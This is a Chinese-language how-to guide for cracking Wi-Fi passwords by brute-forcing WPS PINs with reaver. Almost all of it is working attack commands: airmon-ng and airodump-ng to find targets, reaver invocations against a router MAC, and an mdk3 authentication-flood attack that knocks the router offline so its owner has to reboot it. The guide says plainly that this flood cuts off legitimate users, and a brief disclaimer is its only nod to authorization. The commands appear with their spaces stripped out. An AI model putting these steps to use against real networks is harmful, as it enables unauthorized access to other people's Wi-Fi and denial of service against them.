reaver

PIN码破密特点：

1、不需要客户端

2、有PIN码就能获得无线密码

3、八位数PIN码实际只有一万一千组随机密码

4、抓包、EWSA跑包，每个环节都有很大的不确定性，而PIN破密，只要开户WPS，破密只是个时间问题。



提醒：只限于个人测试使用，由于非法操作引起的相关法律责任与本作者无关。



reaver使用方法、步骤：

1、打开超级终端ROOtshell

2、如果电脑装有多个无线网卡，请先发指令

3、ifconfig-a

4、确认你用哪一个网卡WLAN0或WLAN1



下面的指令都是以单一网卡WLAN0为例



一、激活监听模式：

airmon-ngstartwlan0



二、查看周边AP信息（抓包）：

airodump-ngmon0

wash-imon0-C



观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。



PWR小于-75基本上会Timeout,PWR-60左右,则非常顺畅(2-6秒攻击一次)



三、按Ctrl+C终止抓包



四、抓PIN码：

reaver-imon0-bMAC-vv

例如：

reaver-imon0-bC8:3A:35:F6:BB:B8-vv-a-S-d0-t1



1.4版可用：

reaver-imon0-bC8:3A:35:F6:BB:B8-v（可用一个v）



注意，MAC中冒号不可省略，MAC地址的字母大小写均可，-vv是两个V不是W！

特别提示：



只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!



如何查看AP是否开了WPS、QSS呢？



一、使用指令:

airodump-ngmon0



MB一栏下，出现54e.（看清楚有点“.”）是开WPS的





AP关闭了WPS、或者没有QSS滴，会出现

WARNING:FailedtoassociatewithXX:XX:XX:XX:XX:XX(ESSID:XXXX)



PIN破密对信号要求极为严格,如果信号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码或timeout）,特别是1、6默认频道中，有较多的AP，相互干扰,因此，确定网卡放置的最佳位置、方向、角度十分重要。





破解过程中，重复同一个PIN码或timeout可随时随地按Ctrl+C终止，reaver会自动保存进度。

重复第2-4项内容，先看看AP信号强弱或是否关机，若继续破，则再次在终端中发送:

reaver-imon0-bMAC-vv



当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。总共一万一千个密码。



曙光就在前头，胜利往往在再坚持一下的努力之中。



如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：



reaver-imon0-bMAC-a-vv-pXXXX(PIN前四位数)



会从指定PIN段起破密。





额外：（假如pin死了，就用命令强制让路由器重启）

首先检测网卡：

ifconfig-a



然后模拟端口：

airmon-ngstartwlan0



接下来用：

airodump-ngmon0//扫描ap找到你pin死的路由器mac



用mdk3做身份验证攻击

mdk3mon0a-amac（被pin死的路由器的mac）



身份验证攻击效果说明：

此攻击是针对无线AP的洪水攻击，又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求，这种请求数量一旦超过了无线AP所能承受的范围，AP就会自动断开现有链接，使合法用户无法使用无线网络。迫使路由主人重启路由器。



说明：

此命令功能强大，使用错误会造成所有ap不能使用，请指定mac地址，然后使用，其余命令不要乱试。你要使用此命令的其他参数，请详细阅读此命令参数详解。



此操作会让路由器完全宕机，不但无线不能用，有线的也连接不了，必须重启路由器！

请谨慎使用！